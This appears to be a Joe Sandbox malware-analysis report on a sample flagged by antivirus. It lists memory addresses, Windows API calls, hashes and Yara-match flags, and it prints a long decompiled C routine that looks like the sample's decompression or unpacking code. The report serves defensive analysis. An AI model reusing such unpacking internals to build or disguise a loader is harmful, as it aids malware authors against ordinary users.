                                                                                                                        0x70b22187
                                                                                                                        0x00000000
                                                                                                                        0x70b22187
                                                                                                                        0x70b22164
                                                                                                                        0x70b22164
                                                                                                                        0x70b22167
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b22169
                                                                                                                        0x70b2216c
                                                                                                                        0x70b2216e
                                                                                                                        0x70b2216f
                                                                                                                        0x70b2216f
                                                                                                                        0x70b2216f
                                                                                                                        0x70b22170
                                                                                                                        0x70b22173
                                                                                                                        0x70b22176
                                                                                                                        0x70b22177
                                                                                                                        0x70b22151
                                                                                                                        0x70b22152
                                                                                                                        0x70b22153
                                                                                                                        0x70b22156
                                                                                                                        0x70b22159
                                                                                                                        0x70b2215c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b2215c
                                                                                                                        0x00000000
                                                                                                                        0x70b21fa7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b21fb3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b21f9a
                                                                                                                        0x70b21f9e
                                                                                                                        0x70b21fa2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b2211c
                                                                                                                        0x70b22120
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b22126
                                                                                                                        0x70b2212f
                                                                                                                        0x70b22136
                                                                                                                        0x70b2213e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b22083
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b21fbc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b221a6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b2208b
                                                                                                                        0x70b2208d
                                                                                                                        0x70b2208d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b22196
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b2219a
                                                                                                                        0x70b21cc3
                                                                                                                        0x70b21cc6
                                                                                                                        0x70b21cc9
                                                                                                                        0x00000000
                                                                                                                        0x70b21cc9
                                                                                                                        0x70b21ca9
                                                                                                                        0x70b21c72
                                                                                                                        0x70b21c73
                                                                                                                        0x70b21c8e
                                                                                                                        0x70b21c91
                                                                                                                        0x00000000
                                                                                                                        0x70b21c97
                                                                                                                        0x70b21c97
                                                                                                                        0x70b21c9e
                                                                                                                        0x70b21ca1
                                                                                                                        0x00000000
                                                                                                                        0x70b21ca1
                                                                                                                        0x70b21c91
                                                                                                                        0x70b21c78
                                                                                                                        0x00000000
                                                                                                                        0x70b21c7e
                                                                                                                        0x70b21c7e
                                                                                                                        0x70b21c85
                                                                                                                        0x00000000
                                                                                                                        0x70b21c85
                                                                                                                        0x70b21c78
                                                                                                                        0x70b21e74
                                                                                                                        0x70b21e79
                                                                                                                        0x70b21e7e
                                                                                                                        0x70b21e82
                                                                                                                        0x70b22355
                                                                                                                        0x70b2235b
                                                                                                                        0x70b21e94
                                                                                                                        0x70b21e96
                                                                                                                        0x70b21e97
                                                                                                                        0x70b2227e
                                                                                                                        0x70b2227e
                                                                                                                        0x70b22281
                                                                                                                        0x70b22284
                                                                                                                        0x70b222a1
                                                                                                                        0x70b222a7
                                                                                                                        0x70b222a9
                                                                                                                        0x70b222af
                                                                                                                        0x70b222c6
                                                                                                                        0x70b222c6
                                                                                                                        0x70b222c6
                                                                                                                        0x70b222d3
                                                                                                                        0x70b222d9
                                                                                                                        0x70b222dc
                                                                                                                        0x70b222e2
                                                                                                                        0x70b222e4
                                                                                                                        0x70b222e8
                                                                                                                        0x70b222ea
                                                                                                                        0x70b222f1
                                                                                                                        0x70b222f6
                                                                                                                        0x70b222f9
                                                                                                                        0x70b222fb
                                                                                                                        0x70b22300
                                                                                                                        0x70b22312
                                                                                                                        0x70b22312
                                                                                                                        0x70b22300
                                                                                                                        0x70b222f9
                                                                                                                        0x70b222e8
                                                                                                                        0x70b22318
                                                                                                                        0x70b2231b
                                                                                                                        0x70b22325
                                                                                                                        0x70b2232d
                                                                                                                        0x70b2233a
                                                                                                                        0x70b22340
                                                                                                                        0x70b22343
                                                                                                                        0x70b22273
                                                                                                                        0x70b22273
                                                                                                                        0x00000000
                                                                                                                        0x70b22273
                                                                                                                        0x70b22349
                                                                                                                        0x70b2234f
                                                                                                                        0x70b2234f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b22351
                                                                                                                        0x70b22351
                                                                                                                        0x70b22351
                                                                                                                        0x70b22351
                                                                                                                        0x00000000
                                                                                                                        0x70b2231d
                                                                                                                        0x70b2231d
                                                                                                                        0x70b22323
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b22323
                                                                                                                        0x70b2231b
                                                                                                                        0x70b222b2
                                                                                                                        0x70b222b8
                                                                                                                        0x70b222ba
                                                                                                                        0x70b222c0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b222c0
                                                                                                                        0x70b22286
                                                                                                                        0x70b2228d
                                                                                                                        0x70b22293
                                                                                                                        0x70b22299
                                                                                                                        0x00000000
                                                                                                                        0x70b22299
                                                                                                                        0x70b21e9d
                                                                                                                        0x70b21e9e
                                                                                                                        0x70b2225d
                                                                                                                        0x70b2225d
                                                                                                                        0x70b22263
                                                                                                                        0x70b22266
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b2226d
                                                                                                                        0x70b22272
                                                                                                                        0x00000000
                                                                                                                        0x70b22272
                                                                                                                        0x70b21ea5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b21eab
                                                                                                                        0x70b21eab
                                                                                                                        0x70b21eb4
                                                                                                                        0x70b21eb9
                                                                                                                        0x70b21ebf
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b21ec5
                                                                                                                        0x70b21ed2
                                                                                                                        0x70b21ed8
                                                                                                                        0x70b21ee2
                                                                                                                        0x70b21ee8
                                                                                                                        0x70b21ef0
                                                                                                                        0x70b21f00
                                                                                                                        0x00000000
                                                                                                                        0x70b21f00

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 70B212BB: GlobalAlloc.KERNEL32(00000040,?,70B212DB,?,70B2137F,00000019,70B211CA,-000000A0), ref: 70B212C5
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 70B21D2D
                                                                                                                        • lstrcpyW.KERNEL32(00000008,?), ref: 70B21D75
                                                                                                                        • lstrcpyW.KERNEL32(00000808,?), ref: 70B21D7F
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70B21D92
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70B21E74
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70B21E79
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70B21E7E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$Alloclstrcpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 852173138-0
                                                                                                                        • Opcode ID: f7bbef369d8e534adbc7ec8c1497bf9db9b5fb220bdce3dcd9f851823c0e8e27
                                                                                                                        • Instruction ID: 017c9e271feb9806018684c576906893a2e56181fc7023eed67af68d459516db
                                                                                                                        • Opcode Fuzzy Hash: f7bbef369d8e534adbc7ec8c1497bf9db9b5fb220bdce3dcd9f851823c0e8e27
                                                                                                                        • Instruction Fuzzy Hash: DB22AB71D10209EEDB11CFA4E9806EEB7F4FB98307F20492ED56AE2284E7745B81DB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02AD3203
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: 0E
                                                                                                                        • API String ID: 1029625771-2513510507
                                                                                                                        • Opcode ID: e8e5098e55e2f30f9d04cc9123e2d36d5786d0922932261246ccc41c6807ad78
                                                                                                                        • Instruction ID: f650656659b56f11b5f1beccd7983a9405cba66c9d18006c12e86f4cf4399a70
                                                                                                                        • Opcode Fuzzy Hash: e8e5098e55e2f30f9d04cc9123e2d36d5786d0922932261246ccc41c6807ad78
                                                                                                                        • Instruction Fuzzy Hash: A681587264434A9FDF349E24CC947DB37A7EF96790F95412ECC899B204DB308986CB41
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0;
                                                                                                                        • API String ID: 0-798281000
                                                                                                                        • Opcode ID: d29a1ffba16858742fcbda6800459e00db37e9419eaf79975a7c494cbab5bf7c
                                                                                                                        • Instruction ID: f4d968d8874cd5b2e403623591ddf88666017d97b41cd65024bf1bffbe652c81
                                                                                                                        • Opcode Fuzzy Hash: d29a1ffba16858742fcbda6800459e00db37e9419eaf79975a7c494cbab5bf7c
                                                                                                                        • Instruction Fuzzy Hash: EC317CB4608306CFDF345AB59AE13EF367A8F162A0FB0416ECC47D6142EF61C088C506
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 79%
                                                                                                                        			E00406D85(signed int __ebx, signed int* __esi) {
                                                                                                                        				signed int _t396;
                                                                                                                        				signed int _t425;
                                                                                                                        				signed int _t442;
                                                                                                                        				signed int _t443;
                                                                                                                        				signed int* _t446;
                                                                                                                        				void* _t448;
                                                                                                                        
                                                                                                                        				L0:
                                                                                                                        				while(1) {
                                                                                                                        					L0:
                                                                                                                        					_t446 = __esi;
                                                                                                                        					_t425 = __ebx;
                                                                                                                        					if( *(_t448 - 0x34) == 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					L55:
                                                                                                                        					__eax =  *(__ebp - 0x38);
                                                                                                                        					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                        					__ecx = __ebx;
                                                                                                                        					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                        					__ebx = __ebx + 8;
                                                                                                                        					while(1) {
                                                                                                                        						L56:
                                                                                                                        						if(__ebx < 0xe) {
                                                                                                                        							goto L0;
                                                                                                                        						}
                                                                                                                        						L57:
                                                                                                                        						__eax =  *(__ebp - 0x40);
                                                                                                                        						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                                                        						__ecx = __eax;
                                                                                                                        						__esi[1] = __eax;
                                                                                                                        						__ecx = __eax & 0x0000001f;
                                                                                                                        						if(__cl > 0x1d) {
                                                                                                                        							L9:
                                                                                                                        							_t443 = _t442 | 0xffffffff;
                                                                                                                        							 *_t446 = 0x11;
                                                                                                                        							L10:
                                                                                                                        							_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                        							_t446[0x146] = _t425;
                                                                                                                        							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                                                        							L11:
                                                                                                                        							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                                                        							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                                                        							E004074F4( *(_t448 + 8));
                                                                                                                        							return _t443;
                                                                                                                        						}
                                                                                                                        						L58:
                                                                                                                        						__eax = __eax & 0x000003e0;
                                                                                                                        						if(__eax > 0x3a0) {
                                                                                                                        							goto L9;
                                                                                                                        						}
                                                                                                                        						L59:
                                                                                                                        						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                                                        						__ebx = __ebx - 0xe;
                                                                                                                        						_t94 =  &(__esi[2]);
                                                                                                                        						 *_t94 = __esi[2] & 0x00000000;
                                                                                                                        						 *__esi = 0xc;
                                                                                                                        						while(1) {
                                                                                                                        							L60:
                                                                                                                        							__esi[1] = __esi[1] >> 0xa;
                                                                                                                        							__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                        							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                        								goto L68;
                                                                                                                        							}
                                                                                                                        							L61:
                                                                                                                        							while(1) {
                                                                                                                        								L64:
                                                                                                                        								if(__ebx >= 3) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								L62:
                                                                                                                        								if( *(__ebp - 0x34) == 0) {
                                                                                                                        									goto L182;
                                                                                                                        								}
                                                                                                                        								L63:
                                                                                                                        								__eax =  *(__ebp - 0x38);
                                                                                                                        								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                        								__ecx = __ebx;
                                                                                                                        								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                        								__ebx = __ebx + 8;
                                                                                                                        							}
                                                                                                                        							L65:
                                                                                                                        							__ecx = __esi[2];
                                                                                                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                        							__ebx = __ebx - 3;
                                                                                                                        							_t108 = __ecx + 0x4084d4; // 0x121110
                                                                                                                        							__ecx =  *_t108;
                                                                                                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                                                        							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                        							__ecx = __esi[1];
                                                                                                                        							__esi[2] = __esi[2] + 1;
                                                                                                                        							__eax = __esi[2];
                                                                                                                        							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                                                        							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                                                        								goto L64;
                                                                                                                        							}
                                                                                                                        							L66:
                                                                                                                        							while(1) {
                                                                                                                        								L68:
                                                                                                                        								if(__esi[2] >= 0x13) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								L67:
                                                                                                                        								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                                                                                        								__eax =  *_t119;
                                                                                                                        								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                                                        								_t126 =  &(__esi[2]);
                                                                                                                        								 *_t126 = __esi[2] + 1;
                                                                                                                        							}
                                                                                                                        							L69:
                                                                                                                        							__ecx = __ebp - 8;
                                                                                                                        							__edi =  &(__esi[0x143]);
                                                                                                                        							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                                                        							__eax = 0;
                                                                                                                        							 *(__ebp - 8) = 0;
                                                                                                                        							__eax =  &(__esi[3]);
                                                                                                                        							 *__edi = 7;
                                                                                                                        							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                                                        							if(__eax != 0) {
                                                                                                                        								L72:
                                                                                                                        								 *__esi = 0x11;
                                                                                                                        								while(1) {
                                                                                                                        									L180:
                                                                                                                        									_t396 =  *_t446;
                                                                                                                        									if(_t396 > 0xf) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									L1:
                                                                                                                        									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                                                                                        										case 0:
                                                                                                                        											L101:
                                                                                                                        											__eax = __esi[4] & 0x000000ff;
                                                                                                                        											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                                        											__eax = __esi[5];
                                                                                                                        											__esi[2] = __esi[5];
                                                                                                                        											 *__esi = 1;
                                                                                                                        											goto L102;
                                                                                                                        										case 1:
                                                                                                                        											L102:
                                                                                                                        											__eax = __esi[3];
                                                                                                                        											while(1) {
                                                                                                                        												L105:
                                                                                                                        												__eflags = __ebx - __eax;
                                                                                                                        												if(__ebx >= __eax) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												L103:
                                                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                                                        													goto L182;
                                                                                                                        												}
                                                                                                                        												L104:
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                        												__ecx = __ebx;
                                                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                        												__ebx = __ebx + 8;
                                                                                                                        												__eflags = __ebx;
                                                                                                                        											}
                                                                                                                        											L106:
                                                                                                                        											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                                                        											__eax = __eax &  *(__ebp - 0x40);
                                                                                                                        											__ecx = __esi[2];
                                                                                                                        											__eax = __esi[2] + __eax * 4;
                                                                                                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                                        											__ecx =  *__eax & 0x000000ff;
                                                                                                                        											__eflags = __ecx;
                                                                                                                        											if(__ecx != 0) {
                                                                                                                        												L108:
                                                                                                                        												__eflags = __cl & 0x00000010;
                                                                                                                        												if((__cl & 0x00000010) == 0) {
                                                                                                                        													L110:
                                                                                                                        													__eflags = __cl & 0x00000040;
                                                                                                                        													if((__cl & 0x00000040) == 0) {
                                                                                                                        														goto L125;
                                                                                                                        													}
                                                                                                                        													L111:
                                                                                                                        													__eflags = __cl & 0x00000020;
                                                                                                                        													if((__cl & 0x00000020) == 0) {
                                                                                                                        														goto L9;
                                                                                                                        													}
                                                                                                                        													L112:
                                                                                                                        													 *__esi = 7;
                                                                                                                        													goto L180;
                                                                                                                        												}
                                                                                                                        												L109:
                                                                                                                        												__esi[2] = __ecx;
                                                                                                                        												__esi[1] = __eax;
                                                                                                                        												 *__esi = 2;
                                                                                                                        												goto L180;
                                                                                                                        											}
                                                                                                                        											L107:
                                                                                                                        											__esi[2] = __eax;
                                                                                                                        											 *__esi = 6;
                                                                                                                        											goto L180;
                                                                                                                        										case 2:
                                                                                                                        											L113:
                                                                                                                        											__eax = __esi[2];
                                                                                                                        											while(1) {
                                                                                                                        												L116:
                                                                                                                        												__eflags = __ebx - __eax;
                                                                                                                        												if(__ebx >= __eax) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												L114:
                                                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                                                        													goto L182;
                                                                                                                        												}
                                                                                                                        												L115:
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                        												__ecx = __ebx;
                                                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                        												__ebx = __ebx + 8;
                                                                                                                        												__eflags = __ebx;
                                                                                                                        											}
                                                                                                                        											L117:
                                                                                                                        											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                        											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                        											__ecx = __eax;
                                                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                        											__ebx = __ebx - __eax;
                                                                                                                        											__eflags = __ebx;
                                                                                                                        											__eax = __esi[4] & 0x000000ff;
                                                                                                                        											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                                        											__eax = __esi[6];
                                                                                                                        											__esi[2] = __esi[6];
                                                                                                                        											 *__esi = 3;
                                                                                                                        											goto L118;
                                                                                                                        										case 3:
                                                                                                                        											L118:
                                                                                                                        											__eax = __esi[3];
                                                                                                                        											while(1) {
                                                                                                                        												L121:
                                                                                                                        												__eflags = __ebx - __eax;
                                                                                                                        												if(__ebx >= __eax) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												L119:
                                                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                                                        													goto L182;
                                                                                                                        												}
                                                                                                                        												L120:
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                        												__ecx = __ebx;
                                                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                        												__ebx = __ebx + 8;
                                                                                                                        												__eflags = __ebx;
                                                                                                                        											}
                                                                                                                        											L122:
                                                                                                                        											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                                                        											__eax = __eax &  *(__ebp - 0x40);
                                                                                                                        											__ecx = __esi[2];
                                                                                                                        											__eax = __esi[2] + __eax * 4;
                                                                                                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                                        											__ecx =  *__eax & 0x000000ff;
                                                                                                                        											__eflags = __cl & 0x00000010;
                                                                                                                        											if((__cl & 0x00000010) == 0) {
                                                                                                                        												L124:
                                                                                                                        												__eflags = __cl & 0x00000040;
                                                                                                                        												if((__cl & 0x00000040) != 0) {
                                                                                                                        													goto L9;
                                                                                                                        												}
                                                                                                                        												L125:
                                                                                                                        												__esi[3] = __ecx;
                                                                                                                        												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                                                        												__esi[2] = __eax;
                                                                                                                        												goto L180;
                                                                                                                        											}
                                                                                                                        											L123:
                                                                                                                        											__esi[2] = __ecx;
                                                                                                                        											__esi[3] = __eax;
                                                                                                                        											 *__esi = 4;
                                                                                                                        											goto L180;
                                                                                                                        										case 4:
                                                                                                                        											L126:
                                                                                                                        											__eax = __esi[2];
                                                                                                                        											while(1) {
                                                                                                                        												L129:
                                                                                                                        												__eflags = __ebx - __eax;
                                                                                                                        												if(__ebx >= __eax) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												L127:
                                                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                                                        													goto L182;
                                                                                                                        												}
                                                                                                                        												L128:
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                        												__ecx = __ebx;
                                                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                        												__ebx = __ebx + 8;
                                                                                                                        												__eflags = __ebx;
                                                                                                                        											}
                                                                                                                        											L130:
                                                                                                                        											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                        											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                        											__ecx = __eax;
                                                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                        											__ebx = __ebx - __eax;
                                                                                                                        											__eflags = __ebx;
                                                                                                                        											 *__esi = 5;
                                                                                                                        											goto L131;
                                                                                                                        										case 5:
                                                                                                                        											L131:
                                                                                                                        											__eax =  *(__ebp - 0x30);
                                                                                                                        											__edx = __esi[3];
                                                                                                                        											__eax = __eax - __esi;
                                                                                                                        											__ecx = __eax - __esi - 0x1ba0;
                                                                                                                        											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                                                        											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                                                        												__ecx = __eax;
                                                                                                                        												__ecx = __eax - __edx;
                                                                                                                        												__eflags = __ecx;
                                                                                                                        											} else {
                                                                                                                        												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                                                        												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                                                        												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                                                        											}
                                                                                                                        											__eflags = __esi[1];
                                                                                                                        											 *(__ebp - 0x20) = __ecx;
                                                                                                                        											if(__esi[1] != 0) {
                                                                                                                        												L135:
                                                                                                                        												__edi =  *(__ebp - 0x2c);
                                                                                                                        												do {
                                                                                                                        													L136:
                                                                                                                        													__eflags = __edi;
                                                                                                                        													if(__edi != 0) {
                                                                                                                        														goto L152;
                                                                                                                        													}
                                                                                                                        													L137:
                                                                                                                        													__edi = __esi[0x26e8];
                                                                                                                        													__eflags = __eax - __edi;
                                                                                                                        													if(__eax != __edi) {
                                                                                                                        														L143:
                                                                                                                        														__esi[0x26ea] = __eax;
                                                                                                                        														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                                                        														__eax = __esi[0x26ea];
                                                                                                                        														__ecx = __esi[0x26e9];
                                                                                                                        														__eflags = __eax - __ecx;
                                                                                                                        														 *(__ebp - 0x30) = __eax;
                                                                                                                        														if(__eax >= __ecx) {
                                                                                                                        															__edi = __esi[0x26e8];
                                                                                                                        															__edi = __esi[0x26e8] - __eax;
                                                                                                                        															__eflags = __edi;
                                                                                                                        														} else {
                                                                                                                        															__ecx = __ecx - __eax;
                                                                                                                        															__edi = __ecx - __eax - 1;
                                                                                                                        														}
                                                                                                                        														__edx = __esi[0x26e8];
                                                                                                                        														__eflags = __eax - __edx;
                                                                                                                        														 *(__ebp - 8) = __edx;
                                                                                                                        														if(__eax == __edx) {
                                                                                                                        															__edx =  &(__esi[0x6e8]);
                                                                                                                        															__eflags = __ecx - __edx;
                                                                                                                        															if(__ecx != __edx) {
                                                                                                                        																__eax = __edx;
                                                                                                                        																__eflags = __eax - __ecx;
                                                                                                                        																 *(__ebp - 0x30) = __eax;
                                                                                                                        																if(__eax >= __ecx) {
                                                                                                                        																	__edi =  *(__ebp - 8);
                                                                                                                        																	__edi =  *(__ebp - 8) - __eax;
                                                                                                                        																	__eflags = __edi;
                                                                                                                        																} else {
                                                                                                                        																	__ecx = __ecx - __eax;
                                                                                                                        																	__edi = __ecx;
                                                                                                                        																}
                                                                                                                        															}
                                                                                                                        														}
                                                                                                                        														__eflags = __edi;
                                                                                                                        														if(__edi == 0) {
                                                                                                                        															goto L183;
                                                                                                                        														} else {
                                                                                                                        															goto L152;
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        													L138:
                                                                                                                        													__ecx = __esi[0x26e9];
                                                                                                                        													__edx =  &(__esi[0x6e8]);
                                                                                                                        													__eflags = __ecx - __edx;
                                                                                                                        													if(__ecx == __edx) {
                                                                                                                        														goto L143;
                                                                                                                        													}
                                                                                                                        													L139:
                                                                                                                        													__eax = __edx;
                                                                                                                        													__eflags = __eax - __ecx;
